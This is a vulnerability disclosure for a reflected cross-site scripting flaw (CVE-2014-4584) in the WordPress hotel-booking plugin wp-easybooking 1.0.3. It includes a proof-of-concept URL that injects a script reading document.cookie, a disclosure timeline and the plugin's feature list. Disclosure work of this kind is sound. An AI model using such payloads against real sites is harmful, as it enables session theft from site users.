wp-plugin : wp-easybooking – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-easybooking

 

Effected Version : 1.0.3 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wordpress/wp-content/wp-plugs/wpeasybooking/admin/editFacility.php?fID=fID%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-22

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4584

 
Plugin Description :
 
The **wp-easybooking** plugin gives you the ability to create and manage multiple hotels, hotel owners and bookings.

It supports any language with the help of the free qTranslate plugin. Also provides an area at the administration panel so you can translate every message of the widget, for each language enabled. No .po files, and no .mo files, so no need for Poedit...

Gets currencies rates from the European Central Bank and converts all prices automatically.

The wp-easybooking widget is included so users may search for hotels and make their bookings. The search form includes an ajax pop up window with suggestions of Cities, Countries or Hotels that match the search term.

Users that have completed a booking receive a 4 digit PIN by email so that they may view their booking on-line.

Users do not need to register in order to make a booking.

Five booking statuses : Pending, Confirmed, Canceled, Completed and Expired. Hotel owners (and the administrator) may change the statuses of each booking, and confirm payed amount.

Users get informed about any balance (if they have not payed the full booking amount) from the booking's page.

Guests (users) may pay through bank and paypal.

A premium version also provides package deals (or business packs). In this way the administrator knows the amount that each hotel owes to him. Charges get calculated automatically, based on the package deal, which can be a periodical charge (e.g each month), a percentage of bookings cost, or a combination of both of these charging methods.

In short the free version provides the following features:

1.Unlimited Hotels,
2.Unlimited Hotel Owners (each owner can owe unlimited hotels),
3.Hotel Owners have a separate role (Businessman) to log in to the administration area, and manage their hotels and bookings,
4.Multilingual, with a translation menu for all messages of the widget (no .mo or .po files needed!),
5.Currency conversions (Automatically),
6.Unlimited bookings,
7.Bookings management (Statuses and payment balance),
8.Unlimited room types for each hotel,
9.A list of countries, regions and cities is included,
10.The admin can add ass many new cities needed, fast and easy and also translate it at once,
11.Search and booking widget (Users can search by location or hotel name),
12.Search by date only for available rooms depending on the number of adults, children and babies,
13.No need for users to register in order to make their booking,
14.Booking number and PIN sent for each booking for on-line access to the booking view page (which displays the booking's details),
15.Guests may pay through Bank or Paypal (paypal payment gateway is included!)



For detailed documentation please read the instructions.pdf file or visit the plugin's website .

For any questions contact us at support@wp-easybooking.com

Leave a Reply

Your email address will not be published. Required fields are marked *